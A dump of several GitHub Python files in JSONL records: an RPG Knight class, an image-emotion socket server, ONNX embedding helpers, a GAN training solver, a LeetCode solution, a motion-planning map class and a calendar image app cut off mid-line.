bank_subs['PERIOD_DT'].dt.year)).any():\r\n\r\n print('')\r\n print(bank_subs.groupby(['PERIOD_DT']).agg(['count']))\r\n print('')\r\n print(ind_month.groupby(['M_', 'Y_']).agg(['count']))\r\n\r\n\r\n\r\n proceed = input('Do you wish to proceed?' \\\r\n '(Y/N): ').lower()\r\n\r\n if proceed == 'n':\r\n sys.exit()\r\n elif proceed != 'y':\r\n while proceed != 'y' and proceed != 'n':\r\n proceed = input('Incorrent input. \\n' \\\r\n 'Try again: ')\r\n if proceed == 'n':\r\n sys.exit()\r\nelse:\r\n print('Month or year do not match input number on dm_sm.bank_subsidy.')\r\n sys.exit()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"timofeykl/consistency_check","sub_path":"test_prog.py","file_name":"test_prog.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32233712135","text":"# Python RPG\n# Alex Galhardo Vieira\n# https://github.com/AlexGalhardo/Python-RPG\n# aleexgvieira@gmail.com\n# https://alexgalhardo.com\n\n# !/usr/bin/python3\n# coding: utf-8 \n\n# ./Python/Characters/Knight.py\n\nfrom SuperClass.Character import Character\nfrom SuperClass.Warrior import\tWarrior\nfrom random import randint\nfrom SuperClass.GameStatistics import GameStatistics\n\nfrom Global.GLOBAL_CHARACTERS_VARIABLES import KNIGHT_INITIAL_LIFE, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_INITIAL_MANA, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_ADD_MANA_FOR_LEVEL, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_ADD_LIFE_FOR_LEVEL, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_REG_LIFE_EACH_TURN, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_REG_MANA_EACH_TURN, \\\n\t\t\t\t\t\t\t\t\t KNIGHT_LIGHT_SPELL_MANA_USED, \\\n\t\t\t\t\t\t\t\t\t KNIGHT_MEDIUM_SPELL_MANA_USED, \\\n\t\t\t\t\t\t\t\t\t KNIGHT_STRONG_SPELL_MANA_USED\n\n\nclass Knight(Warrior):\n\n\t'''\n\t-- Herance livingBeing\n\n\tself.totalLife\n\tself.currentlyLife\n\tdef setLiveBeingTotalLife( $setLiveBeingTotalLife )\n\tdeffunction getLiveBeingTotalLife()\n\t'''\n\n\t'''\n\t-- Herance Character\n\tself.characterName\n\tself.characterVocation\n\n\tself.currentlyLevel\n\tself.currentlyXP\n\tself.xpToNextLevel\n\n\tself.totalMana\n\tself.currentlyMana\n\n\tself.totalCapacity\n\tself.currentlyCapacity\n\n\tself.magicLevel\n\tself.manaUsedToNextMagicLevel\n\tself.totalManaUsed\n\n\tdef getCharacterVocation()\n\tdef getCharacterXPToNextLevel()\n\tdef getCharacterCurrentlyMagicLevel()\n\tdef getCharacterCurrentlyLevel()\n\tdef getCharacterCurrentlyMana()\n\tdef getCharacterCurrentlyLife()\n\tdef getCharacterCurrentlyXP()\n\tdef getCharacterTotalManaUsedToNextLevel()\n\tdef getCharacterXPToNextLevel()\n\t'''\n\n\t'''\n\t-- Herance Warrior\n\tself.warriorWeaponAttack\n\tself.warriorWeaponSkillLevel\n\tself.warriorTotalAttacks\n\tself.warriorTotalAttacksToNextWeaponSkillLevel\n\n\tdef setWarriorWeaponAttack(self, characterWeaponAttack )\n\tdef getWarriorWeaponAttack(self)\n\tdef getWarriorTotalAttacksToNextWeaponSkillLevel(self)\n\tdef getWarriorWeaponSkillLevel(self)\n\t'''\n\n\tdef __init__(self,\n\t\t\t\t characterName,\n\t\t\t\t warriorWeaponAttack):\n\n\t\t# constructor warrior superclass\n\t\tsuper().__init__( KNIGHT_INITIAL_LIFE,\n\t\t\t characterName,\n\t\t\t\t\t\t warriorWeaponAttack )\n\n\t\tself.knightTotalMana = KNIGHT_INITIAL_MANA\n\n\t\tself.characterVocation = \"Knight\"\n\n\t\tself.characterCurrentlyMana = KNIGHT_INITIAL_MANA\n\n\t\tself.knightManaUsedToNextMagicLevel = 200\n\n\tdef getLightSpellManaUsed(self):\n\t\treturn KNIGHT_LIGHT_SPELL_MANA_USED\n\n\tdef getMediumSpellManaUsed(self):\n\t\treturn KNIGHT_MEDIUM_SPELL_MANA_USED\n\n\tdef getStrongSpellManaUsed(self):\n\t\treturn KNIGHT_STRONG_SPELL_MANA_USED\n\n\tdef getKnightTotalMana(self):\n\t\treturn self.knightTotalMana\n\n\tdef getKnightManaUsedToNextMagicLevel(self):\n\t\treturn self.knightManaUsedToNextMagicLevel\n\n\tdef getCharacterCurrentlyMana(self):\n\t\treturn self.characterCurrentlyMana\n\n\tdef useLightSpell(self):\n\n\t\tif self.getCharacterCurrentlyMana() >= self.getLightSpellManaUsed():\n\n\t\t\tbaseAttack = self.getWarriorWeaponSkillLevel() * self.getWarriorWeaponAttack()\n\t\t\tbaseAttackFirst = baseAttack * 1.2\n\t\t\tbaseAttackSecond = baseAttack * 1.5\n\n\t\t\tprint('\\n\\t ' + self.getCharacterName() + \" says: Abracadabraaa\")\n\n\t\t\tspellDamage = randint(baseAttackFirst, baseAttackFirst)\n\n\t\t\tprint('\\t Spell Damage: {}'.format(spellDamage))\n\n\t\t\tGameStatistics.totalManaUsed += self.getLightSpellManaUsed()\n\t\t\tself.characterCurrentlyMana -= self.getLightSpellManaUsed()\n\n\t\t\t# update magic level\n\t\t\tif( self.getCharacterTotalManaUsed() >= self.getKnightManaUsedToNextMagicLevel() ):\n\t\t\t\tself.characterCurrentlyMagicLevel += 1\n\t\t\t\tprint('\\n\\t ...Magic Level UPED!')\n\t\t\t\tprint('\\t Currently Magic Level: {}'.format(self.getCharacterCurrentlyMagicLevel()))\n\t\t\t\tself.mageManaUsedToNextMagicLevel *= 5\n\t\t\t\tprint('\\t Mana to Use to next Magic Level: {}\\n'.format(self.getMageManaUsedToNextMagicLevel()))\n\n\n\t\t\treturn spellDamage\n\n\t\telse:\n\t\t\tprint('\\t Dont have sufficient mana! Need at least {} mana points.'.format(self.getLightSpellManaUsed()))\n\n\n\tdef useMediumSpell(self):\n\n\t\tif self.getCharacterCurrentlyMana() >= self.getMediumSpellManaUsed():\n\n\t\t\tbaseAttack = self.getWarriorWeaponSkillLevel() * self.getWarriorWeaponAttack()\n\t\t\tbaseAttackFirst = baseAttack * 1.7\n\t\t\tbaseAttackSecond = baseAttack * 2.5\n\n\t\t\tprint('\\n\\t ' + self.getCharacterName() + \" says: Petrificus Totalus\")\n\n\t\t\tspellDamage = randint(baseAttackFirst, baseAttackFirst)\n\n\t\t\tprint('\\t Spell Damage: {}'.format(spellDamage))\n\n\t\t\tGameStatistics.totalManaUsed += self.getMediumSpellManaUsed()\n\t\t\tself.characterCurrentlyMana -= self.getMediumSpellManaUsed()\n\n\t\t\t# update magic level\n\t\t\tif( self.getCharacterTotalManaUsed() >= self.getKnightManaUsedToNextMagicLevel() ):\n\t\t\t\tself.characterCurrentlyMagicLevel += 1\n\t\t\t\tprint('\\n\\t ...Magic Level UPED!')\n\t\t\t\tprint('\\t Currently Magic Level: {}'.format(self.getCharacterCurrentlyMagicLevel()))\n\t\t\t\tself.knightManaUsedToNextMagicLevel *= 5\n\t\t\t\tprint('\\t Mana to Use to next Magic Level: {}\\n'.format(self.getKnightManaUsedToNextMagicLevel()))\n\n\n\t\t\treturn spellDamage\n\n\t\telse:\n\t\t\tprint('\\t Dont have sufficient mana! Need at least {} mana points.'.format(self.getMediumSpellManaUsed()))\n\t\t\treturn 0\n\n\n\tdef useStrongSpell(self):\n\n\t\tif self.getCharacterCurrentlyMana() >= self.getStrongSpellManaUsed():\n\n\t\t\tbaseAttack = self.getWarriorWeaponSkillLevel() * self.getWarriorWeaponAttack()\n\t\t\tbaseAttackFirst = int(baseAttack * 2.2)\n\t\t\tbaseAttackSecond = int(baseAttack * 3.0)\n\n\t\t\tprint('\\n\\t ' + self.getCharacterName() + \" says: Exori Gran\")\n\n\t\t\tspellDamage = randint(baseAttackFirst, baseAttackSecond)\n\n\t\t\tprint('\\t Spell Damage: {}'.format(spellDamage))\n\n\t\t\tGameStatistics.totalManaUsed += self.getStrongSpellManaUsed()\n\t\t\tself.characterCurrentlyMana -= self.getStrongSpellManaUsed()\n\n\t\t\t# update magic level\n\t\t\tif( self.getCharacterTotalManaUsed() >= self.getKnightManaUsedToNextMagicLevel() ):\n\t\t\t\tself.characterCurrentlyMagicLevel += 1\n\t\t\t\tprint('\\n\\t ...Magic Level UPED!')\n\t\t\t\tprint('\\t Currently Magic Level: {}'.format(self.getCharacterCurrentlyMagicLevel()))\n\t\t\t\tself.mageManaUsedToNextMagicLevel *= 5\n\t\t\t\tprint('\\t Mana to Use to next Magic Level: {}\\n'.format(self.getMageManaUsedToNextMagicLevel()))\n\n\t\t\treturn spellDamage\n\n\t\telse:\n\t\t\tprint('\\t Dont have sufficient mana! Need at least {} mana points.'.format(self.getStrongSpellManaUsed()))\n\t\t\treturn 0\n\n\n\tdef Regenerate(self):\n\n\t\tself.livingBeingCurrentlyLife += KNIGHT_REG_LIFE_EACH_TURN\n\t\tprint('\\t Player Regenerate {} points of life.'.format(KNIGHT_REG_LIFE_EACH_TURN))\n\t\tif self.getLivingBeingCurrentlyLife() > self.getLivingBeingTotalLife():\n\t\t\tprint('\\t Health is full.')\n\t\t\tself.livingBeingCurrentlyLife = self.livingBeingTotalLife\n\n\t\tself.characterCurrentlyMana += KNIGHT_REG_MANA_EACH_TURN\n\t\tprint('\\t Player Regenerated {} points of mana.'.format(KNIGHT_REG_MANA_EACH_TURN))\n\t\tif self.getCharacterCurrentlyMana() > self.getKnightTotalMana():\n\t\t\tprint('\\t Mana is full.')\n\t\t\tself.characterCurrentlyMana = self.knightTotalMana\n\n\tdef Update(self):\n\n\t\tif self.getCharacterCurrentlyXP() >= self.getCharacterXPToNextLevel():\n\t\t\tself.characterXPToNextLevel *= 2\n\t\t\tself.characterCurrentlyLevel += 1\n\t\t\tself.knightTotalMana += KNIGHT_ADD_MANA_FOR_LEVEL\n\t\t\tself.livingBeingTotalLife += KNIGHT_ADD_LIFE_FOR_LEVEL\n\t\t\tprint('\\n\\t ... PLAYER UPED LEVEL!')\n\t\t\tprint('\\t Total Life + {} points!'.format(KNIGHT_ADD_LIFE_FOR_LEVEL))\n\t\t\tprint('\\t Total Mana + {} points!'.format(KNIGHT_ADD_MANA_FOR_LEVEL))\n\t\t\tprint('\\t Currently Player Level: {}'.format(self.getCharacterCurrentlyLevel()))\n\t\t\tprint('\\t Experince to next level: {}'.format(self.getCharacterXPToNextLevel()))\n\n\t\tif self.getWarriorTotalAttacks() >= self.getWarriorTotalAttacksToNextWeaponSkillLevel():\n\t\t\tprint(\"\\t ...Weapon Skill UPED!\")\n\t\t\tprint('\\t Weapon Skill Level: {}'.format(self.getWarriorWeaponSkillLevel()))\n\t\t\tself.warriorTotalAttacksToNextWeaponSkillLevel *= 2\n\t\t\tprint('\\t Total Hits to next Level: {}'.format(self.getWarriorTotalAttacksToNextWeaponSkillLevel()))\n","repo_name":"AlexGalhardo/Python-CLI-Turn-Based-RPG","sub_path":"Characters/Knight.py","file_name":"Knight.py","file_ext":"py","file_size_in_byte":7878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16223719707","text":"import socket\r\nimport tensorflow as tf\r\nimport cv2\r\nimport predictServer as predict\r\n\r\nMODEL_DIR = \"D:\\\\Users\\\\eddy_\\\\Documents\\\\Master-Thesis\\\\Python\\\\CNN\\\\Models\\\\model_2emotions_30.hdf5\"\r\nCASCADE_DIR = \"D:\\\\Users\\\\eddy_\\\\Documents\\\\Master-Thesis\\\\Python\\\\Examples\\\\TrainedCNN\\\\haarcascade_frontalface_alt.xml\"\r\n\r\n#### INITIALIZE CASCADE AND CNN MODEL\r\nface_cascade = cv2.CascadeClassifier(CASCADE_DIR)\r\nmodel = tf.keras.models.load_model(MODEL_DIR)\r\n\r\n#### TEST MODEL BY PREDICTING A TEST IMAGE\r\n#### (First prediction takes longer, dont want this to happen in real time)\r\ninitialize_image = cv2.imread('test.jpg', cv2.IMREAD_GRAYSCALE)\r\nemo = predict.predict(model, initialize_image)\r\n#print(\"Initialized Model Predictor, returned: \", emo)\r\n\r\nSERVER_IP = '192.168.1.33'\r\nPORT = 1026\r\nHEADER_SIZE = 10\r\nc2 = 0\r\n\r\n#### INITIALIZE SOCKET COMMUNICATION\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.bind((SERVER_IP, PORT))\r\ns.listen(5)\r\nclt, adr = s.accept()\r\n\r\nwith clt:\r\n print(f\"Connection to {adr} established\")\r\n finish = False\r\n while True: # Go until Client closes connection\r\n full_msg = b''\r\n new_msg = True\r\n while True: # Go Until full message is received\r\n msg = clt.recv(1024)\r\n if len(msg) == 0:\r\n finish = True\r\n break\r\n if new_msg:\r\n # print(f\"new message length: {msg[:HEADER_SIZE]}\")\r\n msglen = int(msg[:HEADER_SIZE])\r\n new_msg = False\r\n full_msg += msg\r\n\r\n if len(full_msg) - HEADER_SIZE == msglen:\r\n # print(\"full msg rcvd\")\r\n\r\n d = full_msg[HEADER_SIZE:]\r\n pic_path = 'GazeboPics\\\\emotion' + str(c2) + '.png'\r\n\r\n with open(pic_path, 'wb') as f:\r\n f.write(d)\r\n f.close()\r\n\r\n print(\"Send data to predict\")\r\n emotion = predict.isFace(face_cascade, model, pic_path)\r\n\r\n print(\"Image was: \", emotion)\r\n\r\n clt.send(bytes(str(emotion), \"utf-8\"))\r\n\r\n new_msg = True\r\n full_msg = b''\r\n c2 += 1\r\n if finish:\r\n break\r\n\r\n clt.send(bytes(\"THANK YOU FOR CONNECTING !\", \"utf-8\"))\r\n\r\nprint(c2)\r\nclt.close()\r\ns.close()\r\n","repo_name":"eddyhom/Master-Thesis","sub_path":"Python/CNN/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30142608290","text":"############################################################################################\n## 아래 패키지들을 설치해야 함\n'''\npip install datasets\npip install optimum\npip install optimum[onnxruntime]\npip install optimum[onnxruntime-gpu] #gpu 사용인 경우\npip install transformers[onnx]\n''' \n############################################################################################\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom transformers import AutoTokenizer\nfrom optimum.onnxruntime import ORTModelForFeatureExtraction\n\n#----------------------------------------------------------------------------\n# onnx 모델 불러오기\n# -in : model.onnx, vocab.txt 가 저장된 폴더 경로.\n# -out:tokenizer, onnx 모델 인스턴스 \n#----------------------------------------------------------------------------\ndef onnx_model(model_path:str):\n assert model_path is not None, f'model_path is None!'\n \n tokenizer = AutoTokenizer.from_pretrained(model_path)\n model = ORTModelForFeatureExtraction.from_pretrained(model_path)\n return tokenizer, model\n \n#------------------------------------------------------------------------------------------------------------------------------\n# 입력 text(리스트)에 대한 embed vector 생성 후 배열로 리턴함\n# - in : model=모델 인스턴스, contexts=1차원 text 리스트 예: ['오늘 날씨가 너무 좋다']\n# - in : return_tensor=True 이면 tensor값으로 임베딩벡터생성됨.\n# - in : token_embeddings=출력을 어떻게 할지 False=>'sentence embeddings'->768 문장 임베딩 값, True=> token_embeddings=>토큰별 임베딩값\n# - in : normalize : True=임베딩 정규화 화면 출력벡터이 길이가 1이 된다.\n# - out : token_embeddings=True 일때=>토큰별 embedding 으로 출력함=> list[tensor(250,768), tensor(243,768), tensor(111,768),..] tensor 리스트 타입으로 리턴됨.\n# token_embeddings=False 일때 =>1개의 embedding으로 출력함=> array[768, 768, 768,...] float32 array 타입으로 리턴함.\n#------------------------------------------------------------------------------------------------------------------------------\ndef onnx_embed_text(model, tokenizer, paragraphs:list, max_length:int=128, token_embeddings=True, debug=False):\n \n inputs = tokenizer(paragraphs, max_length=max_length, truncation=True, padding=\"max_length\", return_tensors=\"pt\")\n \n outputs = model(**inputs)\n output = outputs.last_hidden_state\n\n if token_embeddings == True: # contexts를 토큰별 embedding 으로 출력함. \n # 한 문장에 대한 attnention_mask에 [1,1,1,1,0,0,0,... ]출력되면 이때 1 카운터 계수만 리스트로 만듬\n # => onnx 모델 outputs은 입력된 padding(0) 값도 출력되므로 128개 배열이 출력됨. 따라서 실제 token들에 계수를 저장해둠.\n attention_mask_list = [list(row).count(1) for row in inputs.attention_mask]\n \n # 한 문단에 대한 문장들에 대해 [tensor(250,768), tensor(243,768), tensor(111,768),..] tensor 리스트 타입으로 벡터 만듬.\n token_embeds = [output[idx][0:attention] for idx, attention in enumerate(attention_mask_list)]\n else: \n # 평균 구해서 배열로 출력 =>[(768,),(768,),(768,),....]\n tmp = [torch.mean(embeds[1], dim=0).numpy() for embeds in enumerate(output)]\n token_embeds = np.array([embedding for embedding in tmp]) #float32 로 embeddings 타입 변경 =>numpy 타입으로 리턴됨\n \n if debug == True:\n print(f'*[onnx_embed_text] outputs: {outputs}')\n print(f'*[onnx_embed_text] output.shape: {output.shape}')\n print(f'*[onnx_embed_text] token_embeds.shape: {token_embeds.shape}') \n print(f'*[onnx_embed_text] token_embeds[0]: {token_embeds[0]}')\n \n return token_embeds\n \n \n# main \nif __name__ == '__main__':\n main()","repo_name":"kobongsoo/GPUTech","sub_path":"myutils/onnx.py","file_name":"onnx.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29201156707","text":"import torch\nimport os\nimport time\nimport datetime\n\nfrom munch import Munch\nfrom utils.checkpoint import CheckpointIO\nfrom utils.misc import get_datetime, send_message\nfrom utils.model import print_network\nfrom utils.file import delete_dir, write_record, delete_model\nfrom models.build import build_model\nfrom solver.utils import he_init, moving_average\nfrom solver.misc import translate_using_label, generate_samples\nfrom solver.loss import compute_g_loss, compute_d_loss\nfrom data.fetcher import Fetcher\nfrom metrics.eval import calculate_metrics, calculate_total_fid\nfrom metrics.fid import calculate_fid_given_paths\n\n\nclass Solver:\n def __init__(self, args):\n super().__init__()\n self.args = args\n self.device = torch.device(args.device)\n self.nets, self.nets_ema = build_model(args)\n for name, module in self.nets.items():\n print_network(module, name)\n # self.to(self.device)\n for net in self.nets.values():\n net.to(self.device)\n for net in self.nets_ema.values():\n net.to(self.device)\n\n if args.mode == 'train':\n # Setup optimizers for all nets to learn.\n self.optims = Munch()\n for net in self.nets.keys():\n self.optims[net] = torch.optim.Adam(\n params=self.nets[net].parameters(),\n lr=args.d_lr if net == 'discriminator' else args.lr,\n betas=(args.beta1, args.beta2),\n weight_decay=args.weight_decay)\n self.ckptios = [\n CheckpointIO(args.model_dir + '/{:06d}_nets.ckpt', **self.nets),\n CheckpointIO(args.model_dir + '/{:06d}_nets_ema.ckpt', **self.nets_ema),\n CheckpointIO(args.model_dir + '/{:06d}_optims.ckpt', **self.optims)]\n else:\n self.ckptios = [CheckpointIO(args.model_dir + '/{:06d}_nets_ema.ckpt', **self.nets_ema)]\n\n self.use_tensorboard = args.use_tensorboard\n if self.use_tensorboard:\n from utils.logger import Logger\n self.logger = Logger(args.log_dir)\n\n def initialize_parameters(self):\n if self.args.parameter_init == 'he':\n for name, network in self.nets.items():\n if 'ema' not in name and 'fan' not in name and 'resnet18' not in name:\n print('Initializing %s...' % name, end=' ')\n network.apply(he_init)\n print('Done.')\n elif self.args.parameter_init == 'default':\n # Do nothing because the parameters has been initialized in this manner.\n pass\n\n def save_model(self, step):\n for ckptio in self.ckptios:\n ckptio.save(step)\n\n def load_model(self, step):\n for ckptio in self.ckptios:\n ckptio.load(step)\n\n def load_model_from_path(self, path):\n for ckptio in self.ckptios:\n ckptio.load_from_path(path)\n\n def zero_grad(self):\n for optimizer in self.optims.values():\n optimizer.zero_grad()\n\n def train(self, loaders):\n args = self.args\n nets = self.nets\n nets_ema = self.nets_ema\n optims = self.optims\n\n train_fetcher = Fetcher(loaders.train, args)\n test_fetcher = Fetcher(loaders.test, args)\n\n # Those fixed samples are used to show the trend.\n fixed_train_sample = next(train_fetcher)\n fixed_test_sample = next(test_fetcher)\n if args.selected_path:\n # actually we don't care y\n fixed_selected_samples = next(iter(loaders.selected))\n fixed_selected_samples = fixed_selected_samples.to(self.device)\n\n # Load or initialize the model parameters.\n if args.start_iter > 0:\n self.load_model(args.start_iter)\n else:\n self.initialize_parameters()\n\n best_fid = 10000\n best_step = 0\n print('Start training...')\n start_time = time.time()\n for step in range(args.start_iter + 1, args.end_iter + 1):\n sample_org = next(train_fetcher) # sample that to be translated\n sample_ref = next(train_fetcher) # reference samples\n\n masks = nets.fan.get_heatmap(sample_org.x) if args.w_hpf > 0 else None\n\n # Train the discriminator\n d_loss, d_loss_ref = compute_d_loss(nets, args, sample_org, sample_ref, masks=masks)\n self.zero_grad()\n d_loss.backward()\n optims.discriminator.step()\n\n # Train the generator, style_encoder and style_transformer\n g_loss, g_loss_ref = compute_g_loss(nets, args, sample_org, sample_ref, masks=masks)\n self.zero_grad()\n g_loss.backward()\n optims.generator.step()\n optims.style_encoder.step()\n optims.style_transformer.step()\n\n # Update corresponding ema version models\n moving_average(nets.generator, nets_ema.generator, beta=args.ema_beta)\n moving_average(nets.style_encoder, nets_ema.style_encoder, beta=args.ema_beta)\n moving_average(nets.style_transformer, nets_ema.style_transformer, beta=args.ema_beta)\n\n if step % args.log_every == 0:\n elapsed = time.time() - start_time\n elapsed = str(datetime.timedelta(seconds=elapsed))[:-7]\n log = \"[%s]-[%i/%i]: \" % (elapsed, step, args.end_iter)\n all_losses = dict()\n for loss, prefix in zip([d_loss_ref, g_loss_ref], ['D/', 'G/']):\n for key, value in loss.items():\n all_losses[prefix + key] = value\n log += ' '.join(['%s: [%.4f]' % (key, value) for key, value in all_losses.items()])\n print(log)\n if args.save_loss:\n if step == args.log_every:\n header = ','.join(['iter'] + [str(loss) for loss in all_losses.keys()])\n write_record(header, args.loss_file, False)\n log = ','.join([str(step)] + [str(loss) for loss in all_losses.values()])\n write_record(log, args.loss_file, False)\n if self.use_tensorboard:\n for tag, value in all_losses.items():\n self.logger.scalar_summary(tag, value, step)\n\n if step % args.sample_every == 0:\n N = args.batch_size\n y_trg_list = [torch.tensor(y).repeat(N).to(self.device) for y in range(min(args.num_domains, 5))]\n translate_using_label(nets, args, fixed_test_sample, y_trg_list,\n os.path.join(args.sample_dir, f\"test_{step}.jpg\"))\n translate_using_label(nets, args, fixed_train_sample, y_trg_list,\n os.path.join(args.sample_dir, f\"train_{step}.jpg\"))\n if args.selected_path:\n N = fixed_selected_samples.shape[0]\n y_trg_list = [torch.tensor(y).repeat(N).to(self.device) for y in range(min(args.num_domains, 5))]\n translate_using_label(nets, args, fixed_selected_samples, y_trg_list,\n os.path.join(args.sample_dir, f\"selected_{step}.jpg\"))\n\n if step % args.save_every == 0:\n self.save_model(step)\n last_step = step - args.save_every\n if last_step != best_step and not args.keep_all_models:\n delete_model(args.model_dir, last_step)\n\n if step % args.eval_every == 0:\n fid = calculate_total_fid(nets_ema, args, f\"step_{step}\")\n if fid < best_fid:\n if not args.keep_all_models:\n delete_model(args.model_dir, best_step)\n best_fid = fid\n best_step = step\n info = f\"step: {step} current fid: {fid:.2f} history best fid: {best_fid:.2f}\"\n send_message(info, args.exp_id)\n write_record(info, args.record_file)\n send_message(\"Model training completed.\")\n\n @torch.no_grad()\n def sample(self):\n args = self.args\n assert args.eval_iter != 0\n self.load_model(args.eval_iter)\n nets_ema = self.nets_ema\n if not args.sample_id:\n args.sample_id = get_datetime()\n sample_path = os.path.join(args.sample_dir, args.sample_id)\n generate_samples(nets_ema, args, sample_path)\n return sample_path\n\n @torch.no_grad()\n def evaluate(self):\n args = self.args\n assert args.eval_path != \"\", \"eval_path shouldn't be empty\"\n target_path = args.eval_path\n sample_path = self.sample()\n fid = calculate_fid_given_paths(paths=[target_path, sample_path], img_size=args.img_size,\n batch_size=args.eval_batch_size)\n print(f\"FID is: {fid}\")\n send_message(f\"Sample {args.sample_id}'s FID is {fid}\")\n if not args.keep_eval_files:\n delete_dir(sample_path)\n","repo_name":"songquanpeng/L2M-GAN","sub_path":"solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":9074,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"70758279236","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n\n if len(nums) == 1: return nums[0]\n if len(nums) <= 3: return max(nums)\n max1 = 0\n max2 = nums[0]\n for i in range(1, len(nums) - 1):\n tsum = max(max1 + nums[i], max2)\n max1 = max2\n max2 = tsum\n tt1 = tsum\n max1 = 0\n max2 = nums[1]\n for i in range(2, len(nums)):\n tsum = max(max1 + nums[i], max2)\n max1 = max2\n max2 = tsum\n tt2 = tsum\n return max(tt1, tt2)","repo_name":"aso2001/LeetCode","sub_path":"0213-house-robber-ii/0213-house-robber-ii.py","file_name":"0213-house-robber-ii.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6035928439","text":"from Obstacle import *\nfrom Robot import *\n\nclass Map():\n \n def __init__(self, obstacles, robot, min_angle=0, max_angle=90):\n self.obstacles = obstacles\n self.robot = robot.copy()\n self.min_angle = min_angle\n self.max_angle = max_angle\n self.getAllCSpaces()\n\n def getAllCSpaces(self):\n self.CSpaces = []\n for angle in xrange(self.min_angle, self.max_angle+1):\n self.CSpaces.append(self.getCSpace(angle))\n \n\n def getCSpace(self, angle=0):\n CSpace = []\n robot = self.robot.copy()\n robot.rotate(angle)\n for o in self.obstacles:\n c = o.copy()\n c.getCSpace(robot)\n CSpace.append(c)\n return CSpace\n\n def pointInCSpace(self,i, point):\n for o in self.CSpaces[i]:\n for p in o.CSpace:\n if p.pointInPoly(point):\n return False\n return True\n \n def vertices(self,i):\n vertices = []\n for o in self.CSpaces[i]:\n vertices.extend(o.mapVertices())\n return vertices\n\n def isSegLegal(self, segment, i):\n for o in self.CSpaces[i]:\n for p in o.CSpace:\n if p.intersectSeg(segment) or p.pointInPoly(segment.midpoint()):\n return False\n return True\n \n","repo_name":"jperezdiaz/6.0S78","sub_path":"pset2/Map.py","file_name":"Map.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18926532174","text":"from PIL import Image, ImageDraw, ImageFont\nfrom datetime import datetime\nfrom apps import App, ExecutionContext, DEFAULT_FONT\nimport calendar\nfrom frame.image_utils import draw_text_with_border\n\n\nclass CalendarApp(App):\n def run(self, context: ExecutionContext):\n width, height = context.image.size\n\n # Get the current month details\n now = datetime.now()\n month_name = now.strftime('%B')\n year = now.strftime('%Y')\n _, last_day = calendar.monthrange(now.year, now.month)\n \n start_day_config = self.get_config('start_day', 'Sunday')\n start_day = 0 if start_day_config == \"Sunday\" else 1\n \n # Config settings\n font_color = self.get_config('font_color', 'black')\n font_size = int(self.get_config('font_size', 40))\n border_color = self.get_config('border_color', 'white')\n border_width = int(self.get_config('border_width', 2))\n calendar_width_percentage = float(self.get_config('calendar_width_percentage', '80')) / 100\n calendar_height_percentage = float(self.get_config('calendar_height_percentage', '80')) / 100\n position = self.get_config('position', 'center-center')\n font = ImageFont.truetype(DEFAULT_FONT, font_size)\n\n title_font_color = self.get_config('title_font_color', 'black')\n title_font_size = int(self.get_config('title_font_size', 50))\n title_border_color = self.get_config('title_border_color', 'white')\n title_border_width = int(self.get_config('title_border_width', 2))\n title_font = ImageFont.truetype(DEFAULT_FONT, title_font_size)\n\n today_font_color = self.get_config('today_font_color', 'red')\n today_font_size = int(self.get_config('today_font_size', 60))\n today_border_color = self.get_config('today_border_color', 'black')\n today_border_width = int(self.get_config('today_border_width', 2))\n today_font = ImageFont.truetype(DEFAULT_FONT, today_font_size)\n\n draw = ImageDraw.Draw(context.image)\n \n # Determine the first weekday of the month (0 = Monday, 6 = Sunday)\n first_weekday_of_month = calendar.monthrange(now.year, now.month)[0]\n\n if start_day == 0: # Sunday as the start of the week\n current_day = 1 - first_weekday_of_month + 6 # +6 because Sunday is represented as 6 in the weekday\n else: # Monday as the start of the week\n current_day = 1 - first_weekday_of_month\n\n # The logic to determine the number of rows required for the month\n days_in_month = last_day\n total_cells = first_weekday_of_month + days_in_month # number of days plus the starting position\n max_rows = 1 + (total_cells + 6) // 7 # ceil division\n\n # Calculate cell size and start position\n padding = 4\n cell_width = (width - 2 * padding) * calendar_width_percentage / 7\n cell_height = (height - 2 * padding) * calendar_height_percentage / max_rows\n\n if position == 'top-left':\n start_x, start_y = padding, padding\n elif position == 'top-center':\n start_x = (width - cell_width * 7) / 2\n start_y = padding\n elif position == 'top-right':\n start_x = width - cell_width * 7 - padding\n start_y = padding\n elif position == 'center-left':\n start_x = padding\n start_y = (height - cell_height * max_rows) / 2\n elif position == 'center-center':\n start_x = (width - cell_width * 7) / 2\n start_y = (height - cell_height * max_rows) / 2\n elif position == 'center-right':\n start_x = width - cell_width * 7 - padding\n start_y = (height - cell_height * max_rows) / 2\n elif position == 'bottom-left':\n start_x = padding\n start_y = height - cell_height * max_rows - padding\n elif position == 'bottom-center':\n start_x = (width - cell_width * 7) / 2\n start_y = height - cell_height * max_rows - padding\n elif position == 'bottom-right':\n start_x = width - cell_width * 7 - padding\n start_y = height - cell_height * max_rows - padding\n\n # Vertical lines\n for i in range(8): # There are 8 lines for 7 columns\n line_start_x = start_x + i * cell_width\n line_start_y = start_y + cell_height # Start below the month title\n line_end_x = line_start_x\n line_end_y = line_start_y + (max_rows - 1) * cell_height\n draw.line([(line_start_x, line_start_y), (line_end_x, 